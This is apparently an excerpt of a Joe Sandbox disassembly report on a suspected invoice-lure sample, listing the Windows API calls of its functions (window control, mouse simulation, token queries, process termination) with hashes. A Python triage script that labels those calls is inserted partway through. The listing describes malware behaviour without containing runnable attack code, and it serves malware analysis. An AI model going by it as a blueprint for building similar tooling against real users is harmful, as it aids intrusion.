• VariantClear.OLEAUT32(?), ref: 00F2F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F2F078
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
APIs
• _memset.LIBCMT ref: 00F32258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F322A3
• IsMenu.USER32(00000000), ref: 00F322C3
• CreatePopupMenu.USER32 ref: 00F322F7
• GetMenuItemCount.USER32(000000FF), ref: 00F32355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F32386
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
APIs
  • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 00ED179A
• GetWindowRect.USER32(?,?), ref: 00ED17FE
• ScreenToClient.USER32(?,?), ref: 00ED181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ED182C
• EndPaint.USER32(?,?), ref: 00ED1876
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
APIs
• ShowWindow.USER32(00F957B0,00000000,01142618,?,?,00F957B0,?,00F5B5A8,?,?), ref: 00F5B712
• EnableWindow.USER32(00000000,00000000), ref: 00F5B736
• ShowWindow.USER32(00F957B0,00000000,01142618,?,?,00F957B0,?,00F5B5A8,?,?), ref: 00F5B796
• ShowWindow.USER32(00000000,00000004,?,00F5B5A8,?,?), ref: 00F5B7A8
• EnableWindow.USER32(00000000,00000001), ref: 00F5B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F5B7EF
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00F44E41,?,?,00000000,00000001), ref: 00F470AC
  • Part of subcall function 00F439A0: GetWindowRect.USER32(?,?), ref: 00F439B3
• GetDesktopWindow.USER32 ref: 00F470D6
• GetWindowRect.USER32(00000000), ref: 00F470DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F4710F
  • Part of subcall function 00F35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F352BC
• GetCursorPos.USER32(?), ref: 00F4713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F47199
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
APIs
  • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
  • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
  • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
• _wcstok.LIBCMT ref: 00F3EC94
• _wcscpy.LIBCMT ref: 00F3ED23
• _memset.LIBCMT ref: 00F3ED56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
APIs
  • Part of subcall function 00F280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F280C0
  • Part of subcall function 00F280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F280CA
  • Part of subcall function 00F280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F280D9
  • Part of subcall function 00F280A9: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F280E0
  • Part of subcall function 00F280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F280F6
• GetLengthSid.ADVAPI32(?,00000000,00F2842F), ref: 00F288CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F288D6
• RtlAllocateHeap.NTDLL(00000000), ref: 00F288DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00F288F6
• GetProcessHeap.KERNEL32(00000000,00000000,00F2842F), ref: 00F2890A
• HeapFree.KERNEL32(00000000), ref: 00F28911
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 169236558-0
APIs
• GetDC.USER32(00000000), ref: 00F2B7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00F2B7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F2B7CD
• ReleaseDC.USER32(00000000,00000000), ref: 00F2B7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F2B7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 00F2B7FE
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: 94321793307ea9667ded1a10677aa6e57f0b40bac890c75421f0bd8faf481fcd
                                                                            • Instruction ID: 98ee6ca24a404fac91b1ee4079dc5bf73e9e655d5ab8b3adf2c2c51c1c3acb88
                                                                            • Opcode Fuzzy Hash: 94321793307ea9667ded1a10677aa6e57f0b40bac890c75421f0bd8faf481fcd
                                                                            • Instruction Fuzzy Hash: D3018475E00319BBEB109BA69C45A5EBFB8EB48321F0040B5FF04EB291D6309C04DF90
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EF0193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00EF019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EF01A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EF01B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00EF01B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00EF01C1
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 39aaf055f2d17ff8a334dca0fb025251d83cd6eb32c0ea82540ad95bd9a74a47
• Instruction ID: 4ffd7459b55b67004f8428738d5149251d096aca1a94612b1b7153e72e875c47
• Opcode Fuzzy Hash: 39aaf055f2d17ff8a334dca0fb025251d83cd6eb32c0ea82540ad95bd9a74a47
• Instruction Fuzzy Hash: 43016CB09017597DE3009F5A8C85B52FFE8FF19354F00415BA15C47941C7F5A868CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F353F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F3540F
• GetWindowThreadProcessId.USER32(?,?), ref: 00F3541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F3542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F35437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F3543E
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 87be0ddaa886498bb8746757dc129c3af64614cf0730a01f61977b253a1defb0
• Instruction ID: eb47b0904c88b6f172b53fb6eacb072d555aba0ff5168caeaff112392fcaa9fe
• Opcode Fuzzy Hash: 87be0ddaa886498bb8746757dc129c3af64614cf0730a01f61977b253a1defb0
• Instruction Fuzzy Hash: E4F01D3264165CBBE7215BA2DC0DEAB7B7CEBC6B12F0001A9FB05D206196A11A05A6B5
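The two records above read more easily once their raw hex arguments are named: the MapVirtualKeyW routine passes the virtual-key codes of Win, Shift, Ctrl and Alt with map type 0, and the routine ending in TerminateProcess first sends message 0x10 (WM_CLOSE) to a window, then opens the owning process with access mask 0x1F0FFF. The Python below is an added example for working with this table; it is not part of the Joe Sandbox report or of the analysed sample. It parses the report's API bullets (the sample rows are copied from the records above), names arguments with Windows SDK constant values, and applies two triage rules of its own. The bullet format it expects, the handling of "Part of subcall function" rows, and the triage rules are this example's assumptions, not Joe Sandbox signatures.

```python
"""Name the hex arguments in a Joe Sandbox "APIs" table (added example, not part of the
report or the sample). Sample bullets are copied from the listing; constant values are the
Windows SDK definitions; triage() holds this example's own heuristics, not report signatures."""
import re
from typing import Dict, List, NamedTuple, Optional, Tuple, Union


class ApiCall(NamedTuple):
    name: str
    module: str
    args: List[Union[int, str, None]]  # hex value, resolved string, or None for the report's '?'
    ref: int                           # call-site address inside the dumped image
    subcall: bool                      # True for "Part of subcall function ..." rows


# Matches "• Name.MODULE(args), ref: ADDR", "• _memset.LIBCMT ref: ADDR" and indented subcall rows.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def _parse_arg(token: str) -> Union[int, str, None]:
    token = token.strip()
    if token == "?":
        return None
    try:
        return int(token, 16)
    except ValueError:
        return token  # a string the plugin resolved, e.g. an export name


def parse_api_line(line: str) -> Optional[ApiCall]:
    """One bullet -> ApiCall; None for header rows such as 'Memory Dump Source'."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [_parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    return ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["sub"] is not None)


# Windows SDK constants, keyed by (API name, zero-based argument position).
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
      0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
WM = {0x10: "WM_CLOSE"}
NAMED: Dict[Tuple[str, int], Dict[int, str]] = {
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("PostMessageW", 1): WM, ("SendMessageTimeoutW", 1): WM,
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("MapVirtualKeyW", 0): VK, ("MapVirtualKeyW", 1): {0x0: "MAPVK_VK_TO_VSC"},
    ("GetDeviceCaps", 1): {0x58: "LOGPIXELSX", 0x5A: "LOGPIXELSY"},
}
MILLIS = {("SendMessageTimeoutW", 5), ("WaitForSingleObject", 1)}  # millisecond timeouts


def annotate(call: ApiCall) -> List[str]:
    """'argN=0x.. NAME' for every argument the tables above can name."""
    out = []
    for i, a in enumerate(call.args):
        if not isinstance(a, int):
            continue
        name = NAMED.get((call.name, i), {}).get(a)
        if name:
            out.append(f"arg{i}=0x{a:X} {name}")
        elif (call.name, i) in MILLIS:
            out.append(f"arg{i}={a} ms")
    return out


def triage(lines: List[str]) -> List[str]:
    """Heuristics over one function record (this example's own rules, not report signatures)."""
    calls = [c for c in map(parse_api_line, lines) if c]
    sent_close = any(c.name in ("PostMessageW", "SendMessageTimeoutW")
                     and len(c.args) > 1 and c.args[1] == 0x10 for c in calls)
    full_access = any(c.name == "OpenProcess" and c.args and c.args[0] == 0x1F0FFF for c in calls)
    modifiers = sum(1 for c in calls if c.name == "MapVirtualKeyW" and c.args and c.args[0] in VK)
    findings = []
    if sent_close and full_access and any(c.name == "TerminateProcess" for c in calls):
        findings.append("WM_CLOSE, then OpenProcess(PROCESS_ALL_ACCESS) + TerminateProcess: "
                        "polite close with a forced-kill fallback")
    if modifiers >= 3:
        findings.append(f"MapVirtualKeyW over {modifiers} modifier keys: "
                        "scan-code lookup for Shift/Ctrl/Alt/Win")
    return findings


# Bullets copied from the two records above (report text, not constructed data).
KILL_ROUTINE = [
    "• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F353F9",
    "• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F3540F",
    "• GetWindowThreadProcessId.USER32(?,?), ref: 00F3541E",
    "• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,"
    "00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F3542D",
    "• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,"
    "00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F35437",
    "• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,"
    "?,?,00000010,00000000,00000000), ref: 00F3543E",
]
MODIFIER_KEYS = [
    "• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EF0193",
    "• MapVirtualKeyW.USER32(00000010,00000000), ref: 00EF019B",
    "• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EF01A6",
    "• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EF01B1",
    "• MapVirtualKeyW.USER32(00000011,00000000), ref: 00EF01B9",
    "• MapVirtualKeyW.USER32(00000012,00000000), ref: 00EF01C1",
]

if __name__ == "__main__":
    for block in (MODIFIER_KEYS, KILL_ROUTINE):
        for call in map(parse_api_line, block):
            print(f"{call.ref:08X} {call.name:<24} {' '.join(annotate(call))}")
        print("  ->", "; ".join(triage(block)))
```

Run as a script it prints both records with named arguments and the triage result for each; extend NAMED with further (API, argument position) tables as other records in the report call for them. The close-then-kill rule fires on the second record because WM_CLOSE followed by OpenProcess with PROCESS_ALL_ACCESS and TerminateProcess is the shape of a window-kill helper, which fits the compiled-AutoIt runtime the report identifies but is also what a legitimate task manager does, so treat the finding as a triage hint rather than a verdict.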
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00F37243
• RtlEnterCriticalSection.NTDLL(?), ref: 00F37254
• TerminateThread.KERNEL32(00000000,000001F6,?,00EE0EE4,?,?), ref: 00F37261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EE0EE4,?,?), ref: 00F3726E
  • Part of subcall function 00F36C35: CloseHandle.KERNEL32(00000000,?,00F3727B,?,00EE0EE4,?,?), ref: 00F36C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00F37281
• RtlLeaveCriticalSection.NTDLL(?), ref: 00F37288
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: f47957cb713c378d07a73e7e59c5a87dd725bc2e5cadb6bbb0b69331d9267610
• Instruction ID: 731d2b1033b69c28be3cbfee72bfcac0d9dae599b29993d70b3ed91128ac32fb
• Opcode Fuzzy Hash: f47957cb713c378d07a73e7e59c5a87dd725bc2e5cadb6bbb0b69331d9267610
• Instruction Fuzzy Hash: 15F05EB6541716EBDB122B64ED4C9DB7729EF45723F100571F603914A0CB7A5805EB50
APIs
• VariantInit.OLEAUT32(?), ref: 00F48613
• CharUpperBuffW.USER32(?,?), ref: 00F48722
• VariantClear.OLEAUT32(?), ref: 00F4889A
  • Part of subcall function 00F37562: VariantInit.OLEAUT32(00000000), ref: 00F375A2
  • Part of subcall function 00F37562: VariantCopy.OLEAUT32(00000000,?), ref: 00F375AB
  • Part of subcall function 00F37562: VariantClear.OLEAUT32(00000000), ref: 00F375B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: 8bb55928d865dfc386d05b9397d204c42b2e9399ddf62fa25d8b8f4db59b75bc
• Instruction ID: 9eff17961ddce2f44ded378a40774e126b780fb319ad2d7111b14363579e3882
• Opcode Fuzzy Hash: 8bb55928d865dfc386d05b9397d204c42b2e9399ddf62fa25d8b8f4db59b75bc
• Instruction Fuzzy Hash: BA918F71A043019FC710DF24C88495EBBE4EF89754F14496EF89A9B362DB31ED06DB92
APIs
  • Part of subcall function 00EEFC86: _wcscpy.LIBCMT ref: 00EEFCA9
• _memset.LIBCMT ref: 00F32B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F32BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F32C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F32C97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: 233fedd44de743085a3e24a93d89874fb7881067219ea95166ecd9c46d3a9681
• Instruction ID: 9bbdd5b26dd538e0c7ec2e44928d45fb14b9ec61f2152dd6472063caad6dc094
• Opcode Fuzzy Hash: 233fedd44de743085a3e24a93d89874fb7881067219ea95166ecd9c46d3a9681
• Instruction Fuzzy Hash: 6E51DE71A083009BDBA59F28D845A6FB7E8EF853B0F141A2DF991E3291DB70CD04A752
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: _memmove$_free
• String ID: 3c$_
• API String ID: 2620147621-4099079164
• Opcode ID: 562430465aec946a659f73678b2ee5340ecca031b6b4472d19fa670f1261678f
• Instruction ID: b6fc7d6fd9f65311c24623b71c7d0ccc4351d61ffb1aedf183b3064cc7275f24
• Opcode Fuzzy Hash: 562430465aec946a659f73678b2ee5340ecca031b6b4472d19fa670f1261678f
• Instruction Fuzzy Hash: D9519B71A043858FDB24CF29C844B6EBBE5EF85314F04592DE999E7391EB31E941CB42
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: _memset$_memmove
• String ID: 3c$ERCP
• API String ID: 2532777613-1756721700
• Opcode ID: 7de2801853cb130c35da7899e220128079ab4b8c2c599b209d36e06ca560c0f1
• Instruction ID: bdeba601a69cf273f76ba3dc09b8c55f4964d8e868bed7b6e08e2d80658725a3
• Opcode Fuzzy Hash: 7de2801853cb130c35da7899e220128079ab4b8c2c599b209d36e06ca560c0f1
• Instruction Fuzzy Hash: 4F51D271900309DBDB24CF66C841BEAB7F4EF58354F20856EE94AEB251E770EA40CB40
APIs
• CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00F2D5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F2D60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F2D61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F2D69D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
• Opcode ID: df892a7f5ceb9ed69e88e3bf35cd4e73e1bd95819922151752b638f3eece9e0a
• Instruction ID: 8328799abb59b0a66c9082ee5b2db135dd780115e4c149d6d349aa6929abc8ab
• Opcode Fuzzy Hash: df892a7f5ceb9ed69e88e3bf35cd4e73e1bd95819922151752b638f3eece9e0a
• Instruction Fuzzy Hash: 4241BFB1600214EFDB04DF64D884B9A7FAAEF44314F1581A9ED09DF246D7B4DD44EBA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F327C0
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F327DC
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00F32822
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F95890,00000000), ref: 00F3286B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
